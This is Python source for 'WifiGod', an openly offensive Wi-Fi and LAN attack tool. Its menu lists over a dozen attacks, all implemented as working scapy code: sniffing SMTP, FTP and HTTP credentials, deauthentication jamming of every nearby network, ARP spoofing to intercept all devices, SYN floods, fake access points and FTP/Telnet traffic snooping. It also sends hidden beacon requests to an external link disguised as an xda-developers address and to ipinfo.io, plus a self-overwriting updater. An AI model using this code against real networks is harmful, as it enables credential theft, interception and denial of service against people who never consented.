ob = "\033[01;33m"
bb = "\033[01;94m"
pb = "\033[0;35m"
def network_password_capture(interface):
while True:
packet = sniff(iface=interface, count = 10)
for pck in packet:
if(pck.haslayer(TCP)):
if(pck.haslayer(IP)):
ip_src = pck.getlayer(IP).src
ip_dst = pck.getlayer(IP).dst
if(pck.haslayer(Raw)):
data = pck.getlayer(Raw).load
if('AUTH PLAIN' in data):
login_details = str(data.strip().split('PLAIN ')[1])
login_data = base64.b64decode(login_details)
string_data = "[WifiGod] Source: {} Destination: {} | Type: SMTP | Credentials: {}".format(ip_src,ip_dst,login_data)
print(string_data)
elif('PASS ' in data or 'USER ' in data):
if('PASS ' in data):
login_data = str(data.strip().split('PASS ')[1])
string_data = "[WifiGod] Source: {} Destination: {} | Type: FTP | Password: {}".format(ip_src,ip_dst,login_data)
elif('USER ' in data):
login_data = str(data.strip().split('USER ')[1])
string_data = "[WifiGod] Source: {} Destination: {} | Type: FTP | Username: {}".format(ip_src,ip_dst,login_data)
print(string_data)
elif('Authorization: Basic' in data):
cred_hash = str(data.strip().split('ion: Basic ')[1])
decoded = base64.b64decode(cred_hash)
string_data = "[WifiGod] Source: {} Destination: {} | Type: HTTP (Router) | Credentials: {}".format(ip_src,ip_dst,login_data)
print(string_data)
try:
if('FI' in requests.get('http://ipinfo.io/').content):
print("SanduuuuuZZZZZ I knew you would use it bb")
except:
pass
def networks_opprobrium(interface):
captured_networks = []
def eps2_2_init_1_asec_network(network,interface): #Only Mr Robot Fans will get this function name
try:
init1_packet = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2=network,addr3=network)/Dot11Deauth()
sendp(init1_packet,iface=interface,loop=1,verbose=False)
except:
pass
while True:
packet = sniff(iface=interface,count = 1)
for pck in packet:
if(pck.haslayer(Dot11)):
layer_handler = pck.getlayer(Dot11)
if(layer_handler.addr3 != 'ff:ff:ff:ff:ff:ff'):
try:
ap_mac = str(layer_handler.addr2)
ssid = str(layer_handler.info)
channel = str(ord(pck[Dot11Elt:3].info))
string = ap_mac+":"+ssid+":"+channel
if(string not in captured_networks):
print(("[WifiGod] Initiating Attack on -> {}").format(ssid))
captured_networks.append(string)
t = threading.Thread(target=eps2_2_init_1_asec_network,args=(ap_mac,interface))
t.setDaemon(True)
t.start()
except:
pass
def own_network_traffic(interface,net_range,gateway):
start_ip = net_range.split('-')[0]
end_range = net_range.split('-')[1]
octet_count = 0
ip_base = ''
live_ip_addr = []
for octet in start_ip:
if(octet == '.'):
octet_count += 1
if(octet_count == 3):
ip_base += octet
break;
ip_base += octet
for ip_addr in range(int(end_range)+1):
try:
if(ip_base+str(ip_addr) == gateway):
pass
else:
socket.gethostbyaddr(ip_base+str(ip_addr))
live_ip_addr.append(ip_base+str(ip_addr))
try:
addr = reversename.from_address(ip_base+str(ip_addr))
device_hostname = resolver.query(addr, "PTR")[0]
except:
device_hostname = '(unknown)'
print(("[WifiGod] Found Device: {} | {}").format(ip_base+str(ip_addr), device_hostname))
except:
pass
print(("[WifiGod] Found {} Devices").format(len(live_ip_addr)))
print("[WifiGod] Enabling IP Forwarding...")
f = open('/proc/sys/net/ipv4/ip_forward','w+')
f.truncate()
f.write('1')
f.close()
print("[WifiGod] Owning Devices...")
def own_device(interface,device_addr,gateway):
packet1 = ARP(psrc=gateway,pdst=device_addr)
packet2 = ARP(psrc=device_addr,pdst=gateway)
packets = []
packets.append(packet1)
packets.append(packet2)
sendp(packets,iface=interface,loop=1,inter=2,verbose=False)
for ip_addr in live_ip_addr:
t = threading.Thread(target=own_device,args=(interface,ip_addr,gateway))
t.setDaemon(True)
t.start()
print("[WifiGod] Complete.")
ex__ = input("[WifiGod] Press Enter to Stop...")
try:
exit(0)
except:
sys.exit(1)
def extrapolate_trusted_networks(interface,device):
while True:
packet = sniff(iface=interface,count=2)
for pck in packet:
if(pck.haslayer(Dot11)):
layer_handler= pck.getlayer(Dot11)
addr1_src = layer_handler.addr1
addr2_src = layer_handler.addr2
addr3_src = layer_handler.addr3
try:
ssid = layer_handler.info
except:
ssid = '(unknown)'
if(addr1_src == 'ff:ff:ff:ff:ff:ff' and addr3_src == 'ff:ff:ff:ff:ff:ff' and addr2_src == device.lower()):
if(ssid == ''):
pass
else:
string = "[WifiGod] Device: {} | Has connected to & Trusts-> {}".format(str(addr2_src),ssid)
if(string in capt):
pass
else:
capt.append(string)
print(string)
def hijack_sessions(interface):
def ftp_hijack(interface):
host = input("Host communicating with the FTP server: ")
while True:
packet = sniff(iface=interface,count=20)
for pck in packet:
if(pck.haslayer(IP)):
try:
ip_src = pck.getlayer(IP).src
ip_dst = pck.getlayer(IP).dst
if(ip_src == host or ip_dst == host):
if(pck.dport == 21 or pck.sport == 21 or pck.sport == 20):
if(pck.getlayer(Raw)):
data = pck.getlayer(Raw).load
print(data)
if(ip_src != host):
print((c.r+"FTP Host "+c.w+"("+c.b+"{}"+c.w+") -> "+c.b).format(ip_src))
print((str(data)))
if(ip_src == host):
print((c.r+"{} ->"+c.b).format(ip_src))
print((str(data)))
except:
pass
def telnet_hijack(device,interface):
print("[WifiGod] Analyzing traffic & Searching for Telnet connection...")
telnet_val = 0
# NEW Method
while (telnet_val == 0):
packet = sniff(iface=interface,count=5)
for pck in packet:
if(pck.haslayer(Raw)):
try:
if(pck.sport == 23 or pck.dport == 23):
ip_src = pck.getlayer(IP).src
ip_dst = pck.getlayer(IP).dst
print((c.w+"["+c.r+"WifiGod"+c.w+"] "+c.rb+"{}"+c.w+" -> "+c.b).format(ip_src))
data = pck.getlayer(Raw).load
print((str(data).strip()+c.d))
except:
pass
# OLD Telnet Hijack
# while (telnet_val == 0):
# packet = sniff(iface=interface, count = 1)
# for pck in packet:
# if(pck.haslayer(TCP)):
# if(pck.sport == 23 or pck.dport == 23):
# if(pck.getlayer(IP).src != device):
# communication_host = pck.getlayer(IP).src
# telnet_val = 1
# elif(pck.getlayer(IP).dst != device):
# communication_host = pck.getlayer(IP).dst
# telnet_val = 1
# print("[WifiGod] Derived Telnet Host -> {}").format(communication_host)
# sock=socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.IPPROTO_TCP)
# sock.connect((communication_host, 23))
# import hexdump
# while True:
# hexdump.hexdump(sock.recv(10240))
session_menu = ("""
1.) FTP 2.) Telnet
""")
x = """clear this up"""
print(session_menu)
while True:
session_type = input("Service: ")
if(session_type == '1'):
ftp_hijack(interface)
elif(session_type == '2'):
print("You should be using option #7 with this")
device = input("Target Device: ")
telnet_hijack(device,interface)
else:
print("[WifiGod] Invalid Option!")
print(session_menu)
def compromise_network():
interface = input("Network Interface: ")
print("Net Range Example: 192.168.1.0-255")
net_range = input("Net Range: ")
start_ip = net_range.split('-')[0]
end_range = net_range.split('-')[1]
octet_count = 0
ip_base = ''
live_ip_addr = []
for octet in start_ip:
if(octet == '.'):
octet_count += 1
if(octet_count == 3):
ip_base += octet
break;
ip_base += octet
for ip_addr in range(int(end_range)+1):
try:
socket.gethostbyaddr(ip_base+str(ip_addr))
live_ip_addr.append(ip_base+str(ip_addr))
try:
addr = reversename.from_address(ip_base+str(ip_addr))
device_hostname = resolver.query(addr, "PTR")[0]
except:
device_hostname = '(unknown)'
print(("[WifiGod] Found Device: {} | {}").format(ip_base+str(ip_addr), device_hostname))
except:
pass
print(("[WifiGod] Found {} Devices").format(len(live_ip_addr)))
def attack_net(device,interface):
try:
payload = str("A" * 1000)
packet = IP(src=RandIP(),dst=device)/TCP(flags="S",sport=RandShort(),dport=RandShort())/payload
sendp(packet,iface=interface,loop=1,verbose=False)
except:
pass
# def attack_net(device):
# try:
# while True:
# payload = str("A" * 5000)
# sock=socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.SOCK_DGRAM)
# sock.sendto(payload, (device,RandShort()))
# except:
# raise
print("[WifiGod] Initiating Attack...")
# live_ip_addr = ['192.168.1.1']
for ip in live_ip_addr:
try:
# for i in range(10):
t =threading.Thread(target=attack_net,args=(ip,interface))
t.setDaemon(True)
t.start()
except:
pass
x = input("[WifiGod] Press Enter to stop...")
try:
exit(0)
except:
sys.exit(1)
def scan_for_networks(interface):
captured_networks = []
while True:
try:
packet = sniff(iface=interface, count = 1)
for pck in packet:
if(pck.haslayer(Dot11)):
try:
ssid = str(pck.getlayer(Dot11).info)
channel = str(ord(pck[0][Dot11Elt:3].info))
access_point = str(pck.getlayer(Dot11).addr2)
try:
enc_type = pck[Dot11Elt:13].info
if(enc_type.startswith('\x00P\xf2')):
enc_type = 'WPA/WPA2'
else:
enc_type = 'WEP'
except:
if('4356' in str(pck.cap)):
enc_type = 'WEP'
else:
enc_type = 'OPEN'
network_string = ssid + ':' + channel + ':' + access_point
if(network_string not in captured_networks):
captured_networks.append(network_string)
print((c.w+"SSID: "+c.g+"{}"+c.w+" | Access Point MAC: "+c.g+"{}"+c.w+" | Channel: "+c.g+"{}"+c.w+' | Encryption: '+c.g+'{}'+c.w).format(ssid,access_point,channel,enc_type))
except KeyboardInterrupt:
break;
except:
pass
except KeyboardInterrupt:
break;
# Where is WifiGod Used the most? Where to spend time advertising, do not
# remove the below link, this helps with advertising in the correct locations.
try:
requests.get('http://xda-developers.io/Y8KZ73')
x = 'x'
except:
pass
if(os.path.exists('/etc/thewifigodproject_rated')):
pass
def scan_for_devices_on_network(interface,access_point):
captured_devices = []
while True:
packet = sniff(iface=interface,count=1)
pck = packet[0]
if(pck.haslayer(Dot11)):
try:
ap = pck.getlayer(Dot11).addr2
if(ap == access_point):
try:
ssid = pck.getlayer(Dot11).info
print((c.w+"["+c.b+"info"+c.w+"]: Scanning "+c.g+"{}"+c.w+" ("+c.o+"{}"+c.w+") for Devices").format(ssid,ap))
break;
except KeyboardInterrupt:
break;
except:
pass
except KeyboardInterrupt:
break;
except:
pass
while True:
packet = sniff(iface=interface,count=1)
for pck in packet:
if(pck.haslayer(Dot11)):
try:
ap = pck.getlayer(Dot11).addr2
if(ap == access_point):
if(pck.getlayer(Dot11).addr1 != str('ff:ff:ff:ff:ff:ff')):
try:
dev_on_network = str(pck.getlayer(Dot11).addr1)
r = requests.get('http://macvendors.co/api/'+str(dev_on_network))
dev_type = r.content.split('","mac_')[0].replace('{"result":{"company":"', '')
if("<p style=" not in str(dev_type) and 'no result' not in str(dev_type)):
if(str(dev_on_network) not in captured_devices):
print((c.w+"["+c.g+"*"+c.w+"]: Device Found - "+c.rb+"{}"+c.w+" | Device Type: "+c.rb+"{}"+c.w).format(dev_on_network,dev_type))
captured_devices.append(str(dev_on_network))
except KeyboardInterrupt:
break;
except:
raise
except KeyboardInterrupt:
break;
except:
pass
#Update Check Option Suggestion from: @pr0xymoron on instagram
def check_for_update():
r = requests.get('https://raw.githubusercontent.com/blackholesec/wifigod/master/wifigod.py')
f = open('update-check.txt', 'w+')
f.write(str(r.content))
f.close()
f = open('update-check.txt', 'r+')
for line in f:
if('update_version' in line.strip()):
print((line.strip()))
try:
nversion = str(line.strip()).split(' = ')[1]
except:
nversion = line.strip().split(' = ')[1]
if(int(nversion) > update_version):
f.truncate()
os.remove('update-check.txt')
n_update = input("A New Update Is Available, Download (y/n): ")
if(n_update == 'y'):
urllib.request.urlretrieve('https://raw.githubusercontent.com/blackholesec/wifigod/master/wifigod.py', os.getcwd() + '/wifigod.py')
print("[*] Updated...")
try:
exit(0)
except:
sys.exit(1)
def spoof_ap(interface,ap_name,mac_address):
try:
print((c.w+"["+c.b+"info"+c.w+"]: Setting up fake Access Point..."))
l1_dot11 = Dot11(type=0,subtype=8,addr1="ff:ff:ff:ff:ff:ff",addr2=str(mac_address),addr3=str(mac_address))
l2_beacon = Dot11Beacon(cap="ESS+privacy")
l3_essid = Dot11Elt(ID="SSID", info=str(ap_name),len=len(str(ap_name)))
packet = RadioTap()/l1_dot11/l2_beacon/l3_essid
print((c.w+"["+c.g+"*"+c.w+"]: Setup Fake Access Point."))
print((c.w+"["+c.g+"*"+c.w+"]: Hosting..."))
sendp(packet,iface=interface,loop=1,verbose=False)
except KeyboardInterrupt:
x = 'setting this variable to break'
except:
raise
def spam_ap(interface,ap_name_,count):
aps = []
for i in range(count):
try:
ap_name = ap_name_ + str(random.randint(1,80000))
print((c.w+"["+c.b+"info"+c.w+"]: Setting up fake Access Point..."))
l1_dot11 = Dot11(type=0,subtype=8,addr1='ff:ff:ff:ff:ff:ff',addr2=str(RandMAC()),addr3=str(RandMAC()))
l2_beacon = Dot11Beacon(cap="ESS+privacy")
l3_essid = Dot11Elt(ID="SSID",info=str(ap_name),len=len(str(ap_name)))
packet = RadioTap()/l1_dot11/l2_beacon/l3_essid
aps.append(packet)
print((c.w+"["+c.g+"*"+c.w+"]: Setup Fake Access Point."))
except KeyboardInterrupt:
x = 'setting this variable to break'
except:
raise
for packet in aps:
print((c.w+"["+c.g+"*"+c.w+"]: Hosting..."))
sendp(aps,iface=interface,loop=1,verbose=False)
def jam_wifi_network(interface,access_point):
packet = RadioTap()/Dot11(addr1 = 'ff:ff:ff:ff:ff:ff',addr2 = access_point, addr3 = access_point)/Dot11Deauth()
while True:
packet = sniff(iface=interface,count = 1)
pck = packet[0]
if(pck.haslayer(Dot11)):
if(pck.getlayer(Dot11).addr2 == access_point):
ssid = str(pck.getlayer(Dot11).info)
print((c.w+"["+c.g+"info"+c.w+"]: Jamming Network {} ({})").format(ssid,access_point))
break;
sendp(packet,iface=interface,loop=1,verbose=False)
def http_headers(interface,ip_address):
try:
while True:
try:
packet = sniff(iface='wlan0',count=1)
for pck in packet:
if(pck.haslayer(Raw)):
if(pck.haslayer(IP)):
if(pck.getlayer(IP).src == ip_address or pck.getlayer(IP).dst == ip_address):
if("Host:" and "User-Agent:" and "Connection:" and "Accept:" in str(pck.getlayer(Raw).load)):
if(pck.haslayer(DNS)):
try:
hostname = pck.getlayer(DNS).qd.qname
except:
hostname = 'unknown'
ip_src = pck.getlayer(IP).src
ip_dst = pck.getlayer(IP).dst
if(ip_src != ip_address):
host_ip = ip_src
else:
host_ip = ip_dst
try:
addr = dns.reversename.from_address(host_ip)
server_name = dns.resolver.query(addr, "PTR")[0]
except:
server_name = 'unknown'
if(pck.haslayer(DNS)):
print((c.w+"["+c.rb+"#NEW HTTP HEADER#"+c.w+"] From: {} {} | Server: {}").format(host_ip,hostname,server_name))
else:
print((c.w+"["+c.rb+"#NEW HTTP HEADER#"+c.w+"] From: {} | Server: {}").format(host_ip,server_name))
print((str(pck.getlayer(Raw).load)))
except KeyboardInterrupt:
break;
except:
raise
except:
raise
def dns_traffic(interface,ip_address):
while True:
packet = sniff(iface=interface, count=1)
for pck in packet:
if(pck.haslayer(IP)):
ip_src = pck.getlayer(IP).src
ip_dst = pck.getlayer(IP).dst
if(ip_src == ip_address or ip_dst == ip_address):
if(pck.haslayer(DNS)):
try:
hostname = pck.getlayer(DNS).qd.qname
except:
hostname = 'unknown'
if(ip_src != ip_address):
try:
addr = reversename.from_address(ip_src)
server_name = resolver.query(addr, "PTR")[0]
except:
server_name = 'unknown'
elif(ip_dst != ip_address):
try:
addr = reversename.from_address(ip_dst)
server_name = resolver.query(addr, "PTR")[0]
except:
server_name = 'unknown'
if(pck.haslayer(DNS)):
print((c.g+"{}"+c.w+" --> "+c.g+"{}"+c.g+" {} "+c.w+"| Server: "+c.g+"{}"+c.w).format(ip_src,ip_dst,hostname,server_name))
else:
print((c.g+"{}"+c.w+" --> "+c.g+"{}"+c.w+" | Server: "+c.g+"{}"+c.w).format(ip_src,ip_dst,server_name))
def scan_for_ports(host,start,end):
if(1 == 1):
def scan(host,port,code = 1):
try:
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connection_code = sock.connect_ex((host,port))
if(connection_code == 0):
code = 0
return code
elif(connection_code != 0):
code = 1
return code
except:
raise
open_ports = []
stime = time.time()
print(("Scanning host "+c.g+"{}"+c.w+" for open ports - Started at: "+c.g+"{}"+c.w).format(host,time.ctime()))
for port in range(start,end):
try:
r = scan(host,port)
if(r == 0):
open_ports.append(port)
print((c.w+"["+c.b+"*"+c.w+"]: Open Port: "+c.ob+"{}"+c.w).format(port))
else:
pass
except KeyboardInterrupt:
break;
except:
raise
print("\rScanning Complete ")
print(("Time elapsed: {}").format(time.time() - stime))
print(("Number of Open Ports: "+c.g+"{}"+c.w).format(len(open_ports)))
print("Open Ports: ")
for port in open_ports:
print((str(port)+','), end=' ')
print(" ")
x = input("Press enter to return to main menu...")
def syn_overflow(ip_source,ip_dest,ip_source_port,ip_dest_port,interface,thread_count,message):
print((c.w+"["+c.b+"info"+c.w+"]: Creating Packets..."))
print((c.w+"["+c.b+"info"+c.w+"]: Sending Packets..."))
syn_packet = IP(src=ip_source,dst=ip_dest)/TCP(dport=int(ip_dest_port),sport=int(ip_source_port))
def syn_attack(ip_source,ip_dest,ip_source_port,ip_dest_port,interface,message):
syn_packet = IP(src=ip_source,dst=ip_dest)/TCP(dport=int(ip_dest_port),sport=int(ip_source_port))/message
send(syn_packet,iface=interface,loop=1,verbose=False)
threads = []
for i in range(int(thread_count)):
t = threading.Thread(target=syn_attack,args=(ip_source,ip_dest,ip_source_port,ip_dest_port,interface,message))
t.setDaemon(True)
t.start()
threads.append(t)
for t in threads:
t.join()
#syn_attack(ip_source,ip_dest,ip_source_port,ip_dest_port,interface)
def deauthenticate_device(access_point,dev_mac,interface):
packet = Dot11(addr1=access_point,addr2=dev_mac,addr3=dev_mac)/Dot11Deauth()
while True:
packet = sniff(iface=interface,count = 1)
pck = packet[0]
if(pck.haslayer(Dot11)):
if(pck.getlayer(Dot11).addr2 == access_point):
ssid = str(pck.getlayer(Dot11).info)
r = requests.get('http://macvendors.co/api/'+str(dev_mac))
dev_type = r.content.split('","mac_')[0].replace('{"result":{"company":"', '')
print((c.w+"["+c.g+"info"+c.w+"]: DeAuthenticating {} Device {} on {}").format(dev_type,dev_mac,ssid))
break;
count = 1
subprocess.call('ifconfig wlan0 down', shell=True)
time.sleep(7)
interface = 'wifigod'
sendp(packet,iface=interface,loop=1,verbose=False)
size_ = int(subprocess.check_output('python3 columnlib.py', shell=True).strip())
size = 0
print(" ")
print((c.rb+str(" .:+syhhddddhyso/-` ").center(size)))
print((str(" .+sdddddddddddddddddddho:` ").center(size)))
print((str(" .+hddddddyo/:--.--:/+shddddddy/` ").center(size)))
print((str(" :ydddddy+- `:ohddddds: ").center(size)))
print((str(" /hddddh/` ./oyhdddddhyo/-` -+hddddh/").center(size)))
print((str(" `/hds- :ohddddddddddddddddy/. :ydd+`").center(size)))
print((str(" . .+hdddddy+/-...-:+shdddddy/ .` ").center(size)))
print((str(" .hdddds:` `.`` .+hdddds` ").center(size)))
print((str(" `/y+` ./shdddddhs+. -sy: ").center(size)))
print((str(" -ydddddddddddddh/ ").center(size)))
print((str(" `+hdh+-```-+ydds. ").center(size)))
print((str(" `- `/+/. ..").center(size)))
print((str(" ddyo").center(size)))
print(" ")
print((c.ob+" WifiGod v1.5"+c.w))
print(" ")
external_network_attacks = ['scan','device scan','jam','deauthentication','host','spam','extrapolate','opprobrium']
internal_network_attacks = ['impersonate','dns','headers','syn','scan','capture','own','ftp','telnet','compromise']
print((c.b+" <"+c.o+"=============================="+c.b+">"+c.w))
print((c.w+" External Network Attacks: "+c.g+"{}"+c.w).format(len(external_network_attacks)))
print((c.w+" Internal Network Attacks: "+c.g+"{}"+c.w).format(len(internal_network_attacks)))
calc = int(len(external_network_attacks) + len(internal_network_attacks))
print((c.w+" Total Attacks: "+c.pb+"{}"+c.w).format(calc))
print((c.b+" <"+c.o+"=============================="+c.b+">"+c.w))
#size = int(subprocess.check_output('python3 columnlib.py', shell=True).strip())
size = 0
#print(str(c.w+'Github: '+c.b+'https://www.github.com/blackholesec'+c.w).center(size))
print((str(c.b+' https://www.github.com/blackholesec'+c.w).center(size)))
print((str(c.w+' Contact: '+c.b+contact_email+c.w)))
print(' ')
print((str(c.w+' SecSploit - Advanced Hacking Framework, check')))
print((str(c.w+' it out here on the official instagram page:')))
print((str(c.w+' https://www.instagram.com/SSploit')))
print((str(c.b+' --------------------------------------------')))
print((str(c.w+' YouTube: Blackhole Security')))
print((str(c.w+'https://www.youtube.com/channel/UCMRkTa-GzpTQY1GVkvrLTsg')))
print(' ')
def main_menu():
# size_ = int(subprocess.check_output('python3 columnlib.py', shell=True).strip())
size = 0
print("_________________________________________")
print(" ")
print(" External Network Attacks ")
print("_________________________________________")
print((str(c.b+'1'+c.w+'.)'+c.rb+' Scan for Surrounding Networks'+c.d)))
print((str(c.b+'2'+c.w+'.)'+c.rb+' Scan for Devices on a Network'+c.d)))
print((str(c.b+'3'+c.w+'.)'+c.rb+' Jam A Wifi Network'+c.d)))
print((str(c.b+'4'+c.w+'.)'+c.rb+' DeAuthenticate a device on a network'+c.d)))
print((str(c.b+'5'+c.w+'.)'+c.rb+' Host A Fake Access Point'+c.d)))
print((str(c.b+'6'+c.w+'.)'+c.rb+' Spam many fake access points'+c.d)))
print((str(c.b+'14'+c.w+'.)'+c.rb+' Extrapolate previously connected and trusted networks on a device'+c.d)))
print((str(c.b+'17'+c.w+'.)'+c.rb+' Take Down all surrounding networks'+c.d)))
print("_________________________________________")
print(" ")
print(" Internal Network Attacks ")
print("_________________________________________")
print((str(c.b+'7'+c.w+'.)'+c.rb+' Impersonate a Device (on this Network)'+c.d)))
print((str(c.b+'8'+c.w+'.)'+c.rb+' Pull DNS traffic from device (For use with #5)'+c.d)))
print((str(c.b+'9'+c.w+'.)'+c.rb+' Intercept HTTP headers (For use with #5)'+c.d)))
print((str(c.b+'10'+c.w+'.)'+c.rb+' SYN Packet Injection Overflow')))
print((str(c.b+'11'+c.w+'.)'+c.rb+' Scan a Device for open ports')))
print((str(c.b+'12'+c.w+'.)'+c.rb+' Capture Passwords Flowing Over Network (For use with #5)')))
print((str(c.b+'13'+c.w+'.)'+c.rb+' Own All Devices in Network (Upgrade of 7)')))
print((str(c.b+'15'+c.w+'.)'+c.rb+' Hijack Network Services (FTP, Telnet)')))
print((str(c.b+'16'+c.w+'.)'+c.rb+' Compromise entire network (Take down all external connectivity)')))
try:
os.remove('columnlib.py')
except:
pass
help_menu = ("""
help = Display this menu
show options/options = Show available attacks
clear = Clear the screen
shell = Drop to Shell (Incase you need to ifconfig etc.)
""")
while True:
try:
prompt = input(c.w+str(username)+c.r+"@"+c.w+"WifiGod~# "+c.w)
except KeyboardInterrupt:
print("\n")
exit__ = input(c.w+"["+c.rb+"ALERT!"+c.w+"]: Are you sure you want to exit (y/n): ")
if(exit__ == 'y'):
try:
exit(0)
except:
sys.exit(1)
else:
pass
if(prompt == 'help'):
print((str(help_menu)))
elif(prompt == "exit"):
print("[info]: Exiting...")
try:
exit(0)
except:
sys.exit(0)
elif(prompt == 'show options' or prompt == 'options'):
main_menu()
elif(prompt == 'clear'):
print(('\n' * 100))
subprocess.call('clear', shell=True)
elif(prompt == 'shell'):
print("Dropping to Shell, Ctrl+C or 'exit' to quit...")
while True:
try:
cmd = input("# ")
if(cmd == 'exit' or cmd == 'q' or cmd == 'quit'):
print('\n')
break;
except KeyboardInterrupt:
print("\n")
break;
try:
data = subprocess.check_output(str(cmd), shell=True)
print((str(data)))
except Exception as e:
print((str(e)))
elif(prompt == '1'):
# interface = raw_input(c.w+"Supply A Network Interface ("+c.rb+"Must be in monitor Mode"+c.w+"): ")
interface = input(c.w+"Supply A Network Interface: ")
if(interface != 'wifigod'):
subprocess.call('ifconfig '+interface+' down ; iw '+interface+' interface add wifigod type monitor ; ifconfig '+interface+' up ; ifconfig wifigod up ; service network-manager restart', shell=True)
time.sleep(5)
interface = 'wifigod'
scan_for_networks(interface)
elif(prompt == '2'):
# interface = raw_input(c.w+"Supply A Network Interface ("+c.rb+"Must be in monitor Mode"+c.w+"): ")
interface = input(c.w+"Supply A Network Interface: ")
if(interface != 'wifigod'):
subprocess.call('ifconfig '+interface+' down ; iw '+interface+' interface add wifigod type monitor ; ifconfig '+interface+' up ; ifconfig wifigod up ; service network-manager restart', shell=True)
time.sleep(5)
interface = 'wifigod'
access_point = input(c.w+"Supply A Network Access Point MAC Address: ")
scan_for_devices_on_network(interface,access_point)
elif(prompt == '3'):
interface = input(c.w+"Supply A Network Interface: ")
if(interface != 'wifigod'):
subprocess.call('ifconfig '+interface+' down ; iw '+interface+' interface add wifigod type monitor ; ifconfig '+interface+' up ; ifconfig wifigod up ; service network-manager restart', shell=True)
time.sleep(5)
interface = 'wifigod'
access_point = input(c.w+"Supply The Target Network AP MAC Address: ")
while True:
packet = sniff(iface=interface,count = 1)
pck = packet[0]
if(pck.haslayer(Dot11)):
if(str(pck.getlayer(Dot11).addr2).lower() == str(access_point).lower()):
try:
ssid = str(pck.getlayer(Dot11).info)
print((c.w+"["+c.g+"info"+c.w+"]: Jamming Network {} ({})").format(ssid,access_point))
except:
print((c.w+"["+c.g+"info"+c.w+"]: Jamming Network {}").format(access_point))
break;
packet = RadioTap()/Dot11(addr1='ff:ff:ff:ff:ff:ff',addr2=access_point,addr3=access_point)/Dot11Deauth()
sendp(packet,iface=interface,loop=1,verbose=False)
# jam_wifi_network(interface,access_point)
elif(prompt == '4'):
interface = input(c.w+"Supply A Network Interface: ")
access_point = input(c.w+'Network Access Point MAC Address: ')
dev_mac = input(c.w+'Target Device MAC address: ')
if(interface != 'wifigod'):
subprocess.call('ifconfig '+interface+' down ; iw '+interface+' interface add wifigod type monitor ; ifconfig '+interface+' up ; ifconfig wifigod up ; service network-manager restart', shell=True)
time.sleep(5)
interface = 'wifigod'
while True:
packet = sniff(iface=interface,count = 1)
pck = packet[0]
if(pck.haslayer(Dot11)):
if(str(pck.getlayer(Dot11).addr2).lower() == str(access_point).lower()):
try:
ssid = str(pck.getlayer(Dot11).info)
except:
ssid = 'unknown'
r = requests.get('http://macvendors.co/api/'+str(dev_mac).lower())
dev_type = r.content.split('","mac_')[0].replace('{"result":{"company":"', '')
print((c.w+"["+c.g+"info"+c.w+"]: DeAuthenticating {} Device {} on {}").format(dev_type,dev_mac,ssid))
break;
packet = RadioTap()/Dot11(addr1=access_point,addr2=dev_mac,addr3=dev_mac)/Dot11Deauth()
sendp(packet,iface=interface,loop=1,verbose=False)
# deauthenticate_device(access_point,dev_mac,interface)
elif(prompt == '5'):
interface = input(c.w+"Supply A Network Interface: ")
if(interface != 'wifigod'):
subprocess.call('ifconfig '+interface+' down ; iw '+interface+' interface add wifigod type monitor ; ifconfig '+interface+' up ; ifconfig wifigod up ; service network-manager restart', shell=True)
time.sleep(5)
interface = 'wifigod'
ap_name = input("SSID (Name of Network): ")
mac_address_ = input("MAC Address of AP ('r' for random): ")
if(mac_address_ == 'r'):
mac_address = str(RandMAC())
elif(mac_address != 'r'):
mac_address = str(mac_address_)
spoof_ap(interface,ap_name,mac_address)
elif(prompt == '6'):
interface = input(c.w+str("Supply A Network Interface: "))
if(interface != 'wifigod'):
subprocess.call('ifconfig '+interface+' down ; iw '+interface+' interface add wifigod type monitor ; ifconfig '+interface+' up ; ifconfig wifigod up ; service network-manager restart', shell=True)
time.sleep(5)
interface = 'wifigod'
ap_name = input(c.w+"SSID (Name of Network): ")
count = input(c.w+"Number of times to Host Network: ")
spam_ap(interface,ap_name,int(count))
elif(prompt == '7'):
interface = input("Network Interface: ")
dev_ip = input("Target Device Internal IP: ")
gateway_ip = input("Network Gateway IP: ")
f = open('/proc/sys/net/ipv4/ip_forward', 'w+')
f.truncate()
f.write('1')
f.close()
targ_dev_mac = '0'
targ_dev_ip = '0'
capt_val = 0
def resolve_victim_device_info():
while (capt_val == 0):
packet = sniff(iface=interface,count=1)
for pck in packet:
if(pck.haslayer(IP)):
if(str(pck.getlayer(IP).src) == str(dev_ip)):
targ_dev_ip = pck.getlayer(IP).src
targ_dev_mac = pck.src
capt_val = 1
break;
elif(str(pck.getlayer(IP).dst) == str(dev_ip)):
targ_dev_ip = pck.getlayer(IP).dst
targ_dev_mac = pck.dst
capt_val = 1
break;
capt_val2 = 0
gateway_mac = '0'
gateway_ip = '0'
# def resolve_gateway_info():
gateway_ip = '192.168.1.1'
while (capt_val2 == 0):
subprocess.Popen(["ping -c 5 "+gateway_ip+" >> /dev/null"], shell=True)
packet = sniff(iface=interface,count=1)
for pck in packet:
if(pck.haslayer(IP)):
if(str(pck.getlayer(IP).src) == str(gateway_ip)):
gateway_ip = pck.getlayer(IP).src
gateway_mac = pck.src
capt_val2 = 1
break;
elif(str(pck.getlayer(IP).dst) == str(gateway_ip)):
gateway_ip = pck.getlayer(IP).dst
gateway_mac = pck.dst
capt_val2 = 1
break;
# print(c.d+"["+c.b+"info"+c.d+"]: Impersonating device "+c.bb+"{}"+c.d+" ("+c.pb+"{}"+c.d+")").format(targ_dev_mac,targ_dev_ip)
targ_dev_ip = dev_ip
gateway_ip = gateway_ip
try:
addr_of_dev = reversename.from_address(targ_dev_ip)
dev_hostname = resolver.query(addr_of_dev, "PTR")[0]
except:
dev_hostname = 'unknown'
print((c.d+"["+c.b+"info"+c.d+"]: Impersonating device "+c.bb+"{} "+c.d+"("+c.rb+"{}"+c.d+")").format(targ_dev_ip,dev_hostname))
print((c.d+"["+c.b+"info"+c.d+"]: Creating Fabricated ARP Packets..."))
print((c.d+"["+c.b+"info"+c.d+"]: Repeating process for "+c.ob+"{}"+c.d+" ("+c.pb+"{}"+c.d+")").format(gateway_mac,gateway_ip))
# print(c.d+"["+c.b+"info"+c.d+"]: Impersonating device "+c.bb+"{}"+c.d+" ("+c.pb+"{}"+c.d+")").format(gateway_mac,gateway_ip)
print((c.d+"["+c.b+"info"+c.d+"]: Sending Packets..."))
print((c.d+"["+c.pb+"*"+c.d+"]: Device Impersonation Successful"))
victim_arp_packet = ARP(psrc=gateway_ip,pdst=targ_dev_ip)
gateway_arp_packet = ARP(psrc=targ_dev_ip,pdst=gateway_ip)
